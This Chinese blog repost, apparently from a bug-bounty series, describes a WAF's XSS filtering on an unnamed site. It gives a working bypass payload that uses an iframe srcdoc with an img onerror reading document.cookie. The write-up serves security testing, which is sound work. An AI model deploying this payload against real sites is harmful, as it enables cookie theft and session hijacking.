10. xss bypass srcdoc - 代码天地

10. xss bypass srcdoc

其他 2021-01-28 01:12:15 阅读次数: 0

layout: post
title: 10. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS

前言

该篇记录为记录实际的src过程第10篇小文章，内容为某网站的xssbypass。

XSS特征

href 会转成遇到j就会转移成 href_
on被waf
src 直接转义成 src_
标签没有被拦截，只拦截了属性

xss绕过payload

这时候想到了iframe的srcdoc
<iframe srcdoc="<img src=x:x onerror=alert(document.cookie)>" />
令人意外的是，新版的chrome开始放飞自我，srcdoc也是可以在chrome上执行的。

后话

xxxxx

猜你喜欢

转载自blog.csdn.net/xiru9972/article/details/113113768

10. xss bypass srcdoc

XSS Bypass

xss bypass 学习记录

8. xss bypass

11. xss bypass aliyunwaf bypass

Bypass xss过滤的测试方法

3. XSS_ByPass

12. xss bypass xss截屏

9. xss bypass formaction绕过

xss-Bypass (From xss-cheat-sheet)

有意思的xss之换行+注释bypass

ByPass

【XSS技巧拓展】————8、通过浏览器缓存来bypass CSP script nonce

那些年我们没能bypass的xss filter[from wooyun]

waf && filter bypass系列——XSS之html语境下的填充符探索。

4. 有意思的xss之组合参数bypass

XSS之xss-labs-level10

10 XSRF和XSS

dvwa-10-xss(反射)

dvwa-10-xss(dom)

DVWA-10.XSS (DOM)

10.

Bypass WAF

rfi bypass

bypass命令

xss

-XSS

h5新增的iframe标签、srcdoc标签

Xss练习(level1-10)

xss_url通关_1-10

今日推荐

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

周排行

返回指定时间格式

fopen函数中的mode参数

Java 单例模式探讨

Flex remoteobject工作原理探讨

寻找mplayer的便捷安装方法

30天了解30种技术系列---(26)MySQL自动化运维工具Inception

关于Jboss/Tomcat/Jetty的JNDI定义123

程序减肥，strip，eu-strip 及其符号表

AsyncTask、View.post(Runnable)、ViewTreeObserver三种方式总结frame animation自动启动

Json和Bean的互相转换

每日归档

更多

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)